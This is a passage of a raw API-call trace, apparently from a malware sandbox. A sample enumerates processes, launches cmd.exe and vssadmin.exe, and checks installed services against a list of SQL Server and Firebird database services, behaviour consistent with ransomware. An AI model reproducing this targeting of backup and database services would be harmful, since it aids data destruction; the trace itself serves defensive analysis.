cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0037.586] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0037.586] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0037.586] lstrlenW (lpString="observationshairy.exe") returned 21 [0037.586] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0037.589] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0037.589] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0037.590] lstrlenW (lpString="spectrum.exe") returned 12 [0037.590] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0037.590] lstrlenW (lpString="dies.exe") returned 8 [0037.590] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0037.591] lstrlenW (lpString="configured.exe") returned 14 [0037.591] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0037.592] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0037.592] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0037.592] lstrlenW (lpString="fast.exe") returned 8 [0037.592] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0037.593] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0037.593] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0037.594] lstrlenW (lpString="review.exe") returned 10 [0037.594] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0037.594] lstrlenW (lpString="historybinding.exe") returned 18 [0037.595] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0037.595] lstrlenW (lpString="pk task surge.exe") returned 17 [0037.595] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.596] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0037.596] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0037.597] lstrlenW (lpString="mobsync.exe") returned 11 [0037.597] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.597] lstrlenW (lpString="dllhost.exe") returned 11 [0037.597] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.598] lstrlenW (lpString="dllhost.exe") returned 11 [0037.598] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0037.599] lstrlenW (lpString="ivttvf.exe") returned 10 [0037.599] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.599] lstrlenW (lpString="cmd.exe") returned 7 [0037.599] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.600] lstrlenW (lpString="conhost.exe") returned 11 [0037.600] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0037.601] lstrlenW (lpString="vssadmin.exe") returned 12 [0037.601] Process32NextW (in: hSnapshot=0x19c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0037.602] CloseHandle (hObject=0x19c) returned 1 [0037.602] Sleep (dwMilliseconds=0x1f4) [0038.497] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efe18 [0038.497] EnumServicesStatusExW (in: hSCManager=0x5efe18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0038.498] GetLastError () returned 0xea [0038.498] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x5be058 [0038.498] EnumServicesStatusExW (in: hSCManager=0x5efe18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x5be058, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x5be058, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0038.498] CloseServiceHandle (hSCObject=0x5efe18) returned 1 [0038.499] lstrlenW (lpString="Appinfo") returned 7 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0038.499] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0038.499] lstrlenW (lpString="AudioSrv") returned 8 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0038.499] lstrlenW (lpString="BFE") returned 3 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0038.499] lstrlenW (lpString="CryptSvc") returned 8 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0038.499] lstrlenW (lpString="CscService") returned 10 [0038.499] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0038.499] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0038.499] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0038.499] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0038.499] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0038.499] lstrlenW (lpString="DcomLaunch") returned 10 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0038.500] lstrlenW (lpString="Dhcp") returned 4 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0038.500] lstrlenW (lpString="Dnscache") returned 8 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0038.500] lstrlenW (lpString="DPS") returned 3 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0038.500] lstrlenW (lpString="eventlog") returned 8 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0038.500] lstrlenW (lpString="EventSystem") returned 11 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0038.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0038.500] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0038.500] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0038.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0038.500] lstrlenW (lpString="gpsvc") returned 5 [0038.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0038.501] lstrlenW (lpString="iphlpsvc") returned 8 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0038.501] lstrlenW (lpString="LanmanServer") returned 12 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0038.501] lstrlenW (lpString="LanmanWorkstation") returned 17 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0038.501] lstrlenW (lpString="lmhosts") returned 7 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0038.501] lstrlenW (lpString="MMCSS") returned 5 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0038.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0038.501] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0038.501] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0038.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0038.501] lstrlenW (lpString="MpsSvc") returned 6 [0038.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0038.502] lstrlenW (lpString="Netman") returned 6 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0038.502] lstrlenW (lpString="netprofm") returned 8 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0038.502] lstrlenW (lpString="NlaSvc") returned 6 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0038.502] lstrlenW (lpString="nsi") returned 3 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0038.502] lstrlenW (lpString="PcaSvc") returned 6 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0038.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0038.502] lstrlenW (lpString="PlugPlay") returned 8 [0038.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0038.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0038.502] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0038.502] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0038.503] lstrlenW (lpString="Power") returned 5 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0038.503] lstrlenW (lpString="ProfSvc") returned 7 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0038.503] lstrlenW (lpString="RpcEptMapper") returned 12 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0038.503] lstrlenW (lpString="RpcSs") returned 5 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0038.503] lstrlenW (lpString="SamSs") returned 5 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0038.503] lstrlenW (lpString="Schedule") returned 8 [0038.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0038.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0038.503] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0038.503] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0038.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0038.503] lstrlenW (lpString="SENS") returned 4 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0038.504] lstrlenW (lpString="ShellHWDetection") returned 16 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0038.504] lstrlenW (lpString="Spooler") returned 7 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0038.504] lstrlenW (lpString="SysMain") returned 7 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0038.504] lstrlenW (lpString="Themes") returned 6 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0038.504] lstrlenW (lpString="TrkWks") returned 6 [0038.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0038.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0038.504] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0038.504] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0038.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0038.504] lstrlenW (lpString="UxSms") returned 5 [0038.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0038.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0038.505] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0038.505] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0038.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0038.505] 